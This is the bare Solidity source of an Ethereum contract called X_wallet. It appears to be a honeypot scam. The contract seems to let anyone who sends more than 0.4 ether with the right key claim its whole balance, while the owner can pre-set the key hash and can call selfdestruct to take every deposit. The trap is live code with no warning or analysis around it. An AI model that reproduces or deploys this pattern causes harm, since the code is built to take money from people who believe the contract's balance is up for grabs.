/** * Source Code first verified at https://etherscan.io on Saturday, May 4, 2019 (UTC) */ pragma solidity ^0.4.25; contract X_wallet { bytes32 keyHash; address owner; bytes32 wallet_id = 0x8b65236d01ab5274303220d4c78b02ef7685ca757275036fc104f62fbe6e10a7; constructor() public { owner = msg.sender; } function withdraw(string key) public payable { require(msg.sender == tx.origin); if(keyHash == keccak256(abi.encodePacked(key))) { if(msg.value > 0.4 ether) { msg.sender.transfer(address(this).balance); } } } function setup_key(string key) public { if (keyHash == 0x0) { keyHash = keccak256(abi.encodePacked(key)); } } function new_haash(bytes32 new_hash) public { if (keyHash == 0x0) { keyHash = new_hash; } } function clear() public { require(msg.sender == owner); selfdestruct(owner); } function get_id() public view returns(bytes32){ return wallet_id; } function () public payable { } }